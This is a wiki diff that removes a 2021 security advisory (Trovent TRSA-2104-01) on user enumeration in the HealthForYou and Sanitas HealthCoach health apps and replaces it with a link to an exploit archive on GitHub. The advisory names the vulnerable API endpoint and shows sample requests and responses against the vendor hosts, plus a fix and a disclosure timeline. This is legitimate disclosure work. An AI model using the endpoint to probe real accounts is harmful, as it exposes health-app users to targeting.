|
|
| Line 1: |
Line 1: |
| | <languages /> | | <languages /> |
| | <translate> | | <translate> |
| − | ==漏洞利用== | + | ==文件== |
| | </translate> | | </translate> |
| − | <pre>
| + | https://github.com/JustYoomoon/Exploit/blob/main/GS20210604133940.tgz |
| − | # Trovent Security Advisory 2104-01 #
| |
| − | #####################################
| |
| − | | |
| − | | |
| − | User enumeration through API
| |
| − | ############################
| |
| − | | |
| − | | |
| − | Overview
| |
| − | ########
| |
| − | | |
| − | Advisory ID: TRSA-2104-01
| |
| − | Advisory version: 1.0
| |
| − | Advisory status: Public
| |
| − | Advisory URL: https://trovent.io/security-advisory-2104-01
| |
| − | Affected product: HealthForYou & Sanitas HealthCoach mobile and web applications
| |
| − | Tested versions: HealthForYou 1.11.1 (com.hansdinslage.connect.HealthForYou),
| |
| − | HealthCoach 2.9.2 (de.sanitas_online.healthcoach)
| |
| − | Vendor: Hans Dinslage GmbH (subsidiary of Beurer GmbH https://www.beurer.com)
| |
| − | Credits: Trovent Security GmbH, Nick Decker
| |
| − | | |
| − | | |
| − | Detailed description
| |
| − | ####################
| |
| − | | |
| − | Trovent Security GmbH discovered a vulnerability in the server API of
| |
| − | the mobile apps Sanitas HealthCoach and HealthForYou.
| |
| − | The API call "/BHMCWebAPI/User/GetIsUserAlreadyExists/?emailId=" allows
| |
| − | to easily enumerate registered usernames and email addresses.
| |
| − | This knowledge could aid an attacker with further exploits as
| |
| − | demonstrated by TRSA-2104-02.
| |
| − | | |
| − | Severity: Medium
| |
| − | CVSS Score: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
| |
| − | CWE ID: CWE-203
| |
| − | CVE ID: N/A
| |
| − | | |
| − | | |
| − | Proof of concept
| |
| − | ################
| |
| − | | |
| − | HealthForYou
| |
| − | ############
| |
| − | | |
| − | Sample request to check if my colleague's email address is registered:
| |
| − | | |
| − | REQUEST:
| |
| − | | |
| − | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| |
| − | | |
| − | | |
| − | | |
| − | Content-Type: application/json; charset=UTF-8
| |
| − | Accept-Encoding: gzip, deflate
| |
| − | User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; ONEPLUS A6003 Build/QKQ1.190716.003)
| |
| − | Host: sync.healthforyou-lidl.com
| |
| − | Connection: close
| |
| − | Content-Length: 0
| |
| − | | |
| − | | |
| − | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| |
| − | | |
| − | RESPONSE:
| |
| − | | |
| − | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| |
| − | | |
| − | | |
| − | HTTP/1.1 200 OK
| |
| − | x-frame-options: SAMEORIGIN
| |
| − | x-xss-protection: 1; mode=block
| |
| − | content-type: application/json; charset=utf-8
| |
| − | content-length: 4
| |
| − | etag: W/"4-X/5TO4MPCKAyY0ipFgr6/IraRNs"
| |
| − | date: Wed, 28 Apr 2021 11:25:24 GMT
| |
| − | x-envoy-upstream-service-time: 118
| |
| − | server: istio-envoy
| |
| − | connection: close
| |
| − | | |
| − | true
| |
| − | | |
| − | | |
| − | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| |
| − | | |
| − | | |
| − | | |
| − | HealthCoach
| |
| − | ###########
| |
| − | | |
| − | Sample request to check if my colleague's email address is registered:
| |
| − | | |
| − | REQUEST:
| |
| − | | |
| − | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| |
| − | | |
| − | | |
| − | | |
| − | Content-Type: application/json; charset=UTF-8
| |
| − | Accept-Encoding: gzip, deflate
| |
| − | User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; ONEPLUS A6003 Build/QKQ1.190716.003)
| |
| − | Host: sync.connect-sanitas-online.de
| |
| − | Connection: close
| |
| − | Content-Length: 0
| |
| − | | |
| − | | |
| − | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| |
| − | | |
| − | RESPONSE:
| |
| − | | |
| − | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| |
| − | | |
| − | | |
| − | HTTP/1.1 200 OK
| |
| − | x-frame-options: SAMEORIGIN
| |
| − | x-xss-protection: 1; mode=block
| |
| − | content-type: application/json; charset=utf-8
| |
| − | content-length: 4
| |
| − | etag: W/"4-X/5TO4MPCKAyY0ipFgr6/IraRNs"
| |
| − | date: Wed, 28 Apr 2021 11:34:02 GMT
| |
| − | x-envoy-upstream-service-time: 78
| |
| − | server: istio-envoy
| |
| − | connection: close
| |
| − | | |
| − | true
| |
| − | | |
| − | | |
| − | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| |
| − | | |
| − | | |
| − | Solution / Workaround
| |
| − | #####################
| |
| − | | |
| − | To mitigate this vulnerability, we recommend to disable this API call.
| |
| − | In general it is recommended to prevent attackers from enumerating valid usernames.
| |
| − | | |
| − | | |
| − | History
| |
| − | #######
| |
| − | | |
| − | 2021-04-27: Vulnerability found
| |
| − | 2021-04-28: Advisory created, vendor and BSI contacted
| |
| − | 2021-04-30: Vendor acknowledged the vulnerability to Trovent and BSI
| |
| − | 2021-06-04: Advisory published
| |
| − | </pre>
| |
